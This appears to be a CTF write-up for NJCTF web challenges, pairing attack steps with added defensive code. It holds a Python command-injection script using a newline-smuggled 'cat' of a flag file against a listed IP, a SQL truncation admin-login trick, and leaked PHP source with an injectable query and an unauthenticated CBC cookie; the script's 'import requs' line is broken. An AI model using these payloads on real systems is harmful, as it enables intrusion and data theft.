NJCTF Writeup


Web

Come On

Just do it. Maybe you know where to get the flag. http://218.2.197.235:23733/

Login

login? http://218.2.197.235:23731/

We guessed that the backend checks the user by selecting the username and password together, so the bug is arbitrary user login. Register a username like "admin xxx" (admin, then spaces, then x's); the database truncates the trailing x's. Then log in as admin with the password registered earlier, and you are in the admin account and get the flag.
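The collision above comes from two database behaviours working together: an over-long value is cut to the column width, and trailing spaces are ignored when strings are compared. The Python below is an added example (not part of the writeup) that models both behaviours and shows the registration-time check a defender would add: reject names that are not already in canonical form, and reject any name that would be looked up as an existing account after truncation. The column width MAX_LEN and the database's truncate-and-ignore-trailing-spaces behaviour are assumptions chosen to match what the writeup relies on.

```python
from typing import Iterable

MAX_LEN = 10  # constructed column width (assumption, not from the challenge)


def stored_form(username: str, max_len: int = MAX_LEN) -> str:
    """What a lenient database ends up storing: the value cut to the column width."""
    return username[:max_len]


def compare_form(stored: str) -> str:
    """What a trailing-space-insensitive comparison actually compares."""
    return stored.rstrip(" ")


def collides(candidate: str, existing: str, max_len: int = MAX_LEN) -> bool:
    """True if registering `candidate` would later be looked up as `existing`."""
    return (compare_form(stored_form(candidate, max_len))
            == compare_form(stored_form(existing, max_len)))


def safe_to_register(candidate: str, taken: Iterable[str],
                     max_len: int = MAX_LEN) -> bool:
    """Registration check: reject names that are not already canonical
    (no leading/trailing whitespace, within the column width) and names
    that would collide with an existing account after truncation."""
    if candidate != candidate.strip() or len(candidate) > max_len:
        return False
    return not any(collides(candidate, t, max_len) for t in taken)


if __name__ == "__main__":
    taken = {"admin"}
    attempt = "admin     xxx"  # 5 letters + 5 spaces + 3 x's = 13 chars, over MAX_LEN
    print(repr(stored_form(attempt)))        # 'admin     ' -> compared as 'admin'
    print(collides(attempt, "admin"))        # True
    print(safe_to_register(attempt, taken))  # False: rejected at registration
```

The check is deliberately done in application code in terms of the database's comparison semantics; enabling the database's strict mode so that over-long values are rejected rather than silently cut is the complementary fix.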

Be Logical

Don't be a bad guy, please. http://218.2.197.235:23739/

Be admin

are you admin? http://218.2.197.235:23737/

index.php.bak gives the backed-up source, shown below:

<?php
error_reporting(0);
define("SECRET_KEY", "......");
define("METHOD", "aes-128-cbc");
 
session_start();
 
function get_random_token(){
    $random_token='';
    for($i=0;$i<16;$i++){
        $random_token.=chr(rand(1,255));
    }
    return $random_token;
}
 
function get_identity()
{
    global $defaultId;
    $j = $defaultId;
    $token = get_random_token();
    $c = openssl_encrypt($j, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $token);
    $_SESSION['id'] = base64_encode($c);
    setcookie("ID", base64_encode($c));
    setcookie("token", base64_encode($token));
    if ($j === 'admin') {
        $_SESSION['isadmin'] = true;
    } else $_SESSION['isadmin'] = false;
 
}
 
function test_identity()
{
    if (!isset($_COOKIE["token"]))
        return array();
    if (isset($_SESSION['id'])) {
        $c = base64_decode($_SESSION['id']);
        if ($u = openssl_decrypt($c, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, base64_decode($_COOKIE["token"]))) {
            if ($u === 'admin') {
                $_SESSION['isadmin'] = true;
            } else $_SESSION['isadmin'] = false;
        } else {
            die("ERROR!");
        }
    }
}
 
function login($encrypted_pass, $pass)
{
    $encrypted_pass = base64_decode($encrypted_pass);
    $iv = substr($encrypted_pass, 0, 16);
    $cipher = substr($encrypted_pass, 16);
    $password = openssl_decrypt($cipher, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv);
    return $password == $pass;
}
 
 
 
function need_login($message = NULL) {
    echo "   <!doctype html>
        <html>
        <head>
        <meta charset=\"UTF-8\">
        <title>Login</title>
        <link rel=\"stylesheet\" href=\"CSS/target.css\">
            <script src=\"https://cdnjs.cloudflare.com/ajax/libs/prefixfree/1.0.7/prefixfree.min.js\"></script>
        </head>
        <body>";
    if (isset($message)) {
        echo "  <div>" . $message . "</div>\n";
    }
    echo "<form method=\"POST\" action=''>
            <div class=\"body\"></div>
                <div class=\"grad\"></div>
                    <div class=\"header\">
                        <div>Log<span>In</span></div>
                    </div>
                    <br>
                    <div class=\"login\">
                        <input type=\"text\" placeholder=\"username\" name=\"username\">
                        <input type=\"password\" placeholder=\"password\" name=\"password\">               
                        <input type=\"submit\" value=\"Login\">
                    </div>
                     <script src='http://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
            </form>
        </body>
    </html>";
}
 
function show_homepage() {
    echo "<!doctype html>
<html>
<head><title>Login</title></head>
<body>";
    global $flag;
    printf("Hello ~~~ ctfer! ");
    if ($_SESSION["isadmin"])
        echo $flag;
    echo "<div><a href=\"logout.php\">Log out</a></div>
</body>
</html>";
 
}
 
if (isset($_POST['username']) && isset($_POST['password'])) {
    $username = (string)$_POST['username'];
    $password = (string)$_POST['password'];
    $query = "SELECT username, encrypted_pass from users WHERE username='$username'";
    $res = $conn->query($query) or trigger_error($conn->error . "[$query]");
    if ($row = $res->fetch_assoc()) {
        $uname = $row['username'];
        $encrypted_pass = $row["encrypted_pass"];
    }
 
    if ($row && login($encrypted_pass, $password)) {
        echo "you are in!" . "</br>";
        get_identity();
        show_homepage();
    } else {
        echo "<script>alert('login failed!');</script>";
        need_login("Login Failed!");
    }
 
} else {
    test_identity();
    if (isset($_SESSION["id"])) {
        show_homepage();
    } else {
        need_login();
    }
}
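In the leaked source the encrypted identity is kept server-side in $_SESSION['id'], but test_identity() takes the CBC IV from the client's token cookie and nothing authenticates the IV or the ciphertext before the decrypted value is compared with 'admin'. The Python below is an added example (not part of the writeup or the challenge code) that models that token scheme next to an encrypt-then-MAC variant which rejects a modified cookie before decrypting. AES-128-CBC is replaced by a toy 16-byte Feistel permutation built from SHA-256 so the script needs only the standard library; the CBC-level behaviour shown does not depend on the block cipher. The key and the default identity 'guest' are constructed values (the page does not say what $defaultId is).

```python
import hashlib
import hmac
import os

BLOCK = 16
KEY = b"demo-key-not-the-real-SECRET_KEY"  # constructed, stands in for SECRET_KEY


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key: bytes, half: bytes, rnd: int) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Toy 128-bit block permutation (4-round Feistel); a stand-in for AES."""
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, r, rnd))
    return r + l


def block_decrypt(key: bytes, block: bytes) -> bytes:
    r, l = block[:8], block[8:]  # undo the final swap
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, l, rnd)), l
    return l + r


def pad(b: bytes) -> bytes:  # PKCS#7, as openssl_encrypt applies it
    n = BLOCK - len(b) % BLOCK
    return b + bytes([n]) * n


def unpad(b: bytes) -> bytes:
    n = b[-1]
    if not 1 <= n <= BLOCK or b[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return b[:-n]


def cbc_encrypt(key: bytes, iv: bytes, pt: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        blk = ct[i:i + BLOCK]
        out += _xor(block_decrypt(key, blk), prev)  # first block depends on the IV only
        prev = blk
    return out


# --- model of get_identity() / test_identity(): ciphertext in the session, IV in a cookie ---
def issue_unauthenticated(identity: str):
    iv = os.urandom(BLOCK)
    return iv, cbc_encrypt(KEY, iv, pad(identity.encode()))  # (cookie "token", session "id")


def check_unauthenticated(cookie_iv: bytes, session_ct: bytes) -> str:
    return unpad(cbc_decrypt(KEY, cookie_iv, session_ct)).decode(errors="replace")


# --- hardened variant: encrypt-then-MAC over IV and ciphertext, checked before decryption ---
def issue_authenticated(identity: str):
    iv, ct = issue_unauthenticated(identity)
    tag = hmac.new(KEY, iv + ct, hashlib.sha256).digest()
    return iv, ct, tag


def check_authenticated(cookie_iv: bytes, session_ct: bytes, tag: bytes):
    expected = hmac.new(KEY, cookie_iv + session_ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        return None  # any change to the client-supplied IV is refused
    return check_unauthenticated(cookie_iv, session_ct)


if __name__ == "__main__":
    iv, ct = issue_unauthenticated("guest")
    tampered = bytes([iv[0] ^ 0x01]) + iv[1:]  # one bit of the cookie changed
    print(check_unauthenticated(iv, ct), check_unauthenticated(tampered, ct))  # guest fuest
    iv2, ct2, tag = issue_authenticated("guest")
    print(check_authenticated(bytes([iv2[0] ^ 0x01]) + iv2[1:], ct2, tag))  # None
```

The unauthenticated check decrypts a changed cookie without any error, so the server cannot tell a forged IV from a genuine one; the MAC variant fails closed on the first modified byte. A separate, smaller issue in login() is the loose comparison `$password == $pass`, which should be a strict `===` (or hash_equals) on the decrypted value.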

Wallet

There is a flag in the wallet. http://218.2.197.235:23723/

Get Flag

Quit yapping and come get the FLAG. PS: delay 5s http://218.2.197.235:23725/

Using %0a (newline) and %20 (space) together with the RCE, list the root directory to find the flag file, /9iZM2qTEmq67SOdJp%!oJm2%M4!nhS_thi5_flag, then cat it to get the flag.

#!/usr/bin/env python3
import base64
import re
from urllib.parse import unquote

import requs

url = "http://218.2.197.235:23725/hehe"
# First step, used to list the root directory and find the flag file name:
# payload = 'test%0als%20/'
# %0a is a newline and %20 a space; unquote turns them back into the raw characters
# (the invalid escapes inside the file name, such as %!o, are left as they are).
payload = unquote('test%0acat%20/9iZM2qTEmq67SOdJp%!oJm2%M4!nhS_thi5_flag')
data = {'flag': payload, 'submit': ''}
content = requests.post(url, data=data).text
# The response embeds the command output as a base64 string (it starts with "Y2F",
# the encoding of "ca..."); pick it out up to the closing quote.
result = re.findall(r'(Y2F.*)"', content)[0]

print(base64.b64decode(result).decode(errors="replace"))
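From the defender's side, the tell-tale of this class of injection is a request parameter that, once URL-decoded, contains a newline or another shell separator. The Python below is an added example (not part of the writeup) that walks a few constructed access-log lines, decodes the query string and logged body with the standard library, and reports the parameters that carry such a character. The log format, field names and sample lines are constructed for the demonstration and are not from the challenge server.

```python
import re
from urllib.parse import parse_qsl

# Characters that let one parameter value turn into a second shell command.
SEPARATORS = {
    "\n": "newline (%0a)",
    "\r": "carriage return (%0d)",
    ";": "semicolon",
    "|": "pipe",
    "&": "ampersand",
    "`": "backtick",
    "$(": "command substitution",
}

# Constructed sample log: client, request line, status, and the logged POST body.
SAMPLE_LOG = """\
10.0.0.5 "POST /hehe" 200 body="flag=test%0als%20%2F&submit="
10.0.0.5 "POST /hehe" 200 body="flag=test&submit="
10.0.0.9 "GET /hehe?flag=hello%20world" 200 body=""
10.0.0.7 "POST /hehe" 200 body="flag=a%3Bls&submit="
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>\S+) (?P<path>\S+)" (?P<status>\d+) body="(?P<body>[^"]*)"$'
)


def suspicious_values(query_or_body: str):
    """Yield (param, decoded_value, reason) for each parameter whose decoded value
    contains a shell separator. parse_qsl decodes percent-escapes, so %0a -> '\\n'."""
    for name, value in parse_qsl(query_or_body, keep_blank_values=True):
        for sep, reason in SEPARATORS.items():
            if sep in value:
                yield name, value, reason
                break


def scan_log(text: str):
    """Return a list of findings (ip, path, param, reason) over a whole log."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # lines in another format are skipped, not guessed at
        path, _, query = m["path"].partition("?")
        sources = [m["body"]] + ([query] if query else [])
        for src in sources:
            for param, _value, reason in suspicious_values(src):
                findings.append((m["ip"], path, param, reason))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print("suspect: ip=%s path=%s param=%s (%s)" % finding)
```

Decoding before matching matters: a rule that looks for a literal newline in the raw request line never fires, because the newline only exists after the server URL-decodes the parameter. The same check, applied to the parameter on the way in rather than to the log afterwards, is the input validation that would have stopped the command from running at all.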

pictures' wall

There are pictures on the picture wall. http://218.2.197.235:23719/

Text wall

A message wall, 2333333333333333333333333 http://218.2.197.235:23721/

Blog

The road to front-end development starts with writing a blog. http://218.2.197.235:23727 Attachment download

Chall I

Our front-end dev ran off with my sister-in-law, so there is no choice but to learn JS from scratch; might as well write both the front end and the back end in JS. PS: no scanning is needed for this challenge. http://218.2.197.235:23729/

Chall II

You have to get the first flag first. http://218.2.197.235:23729/
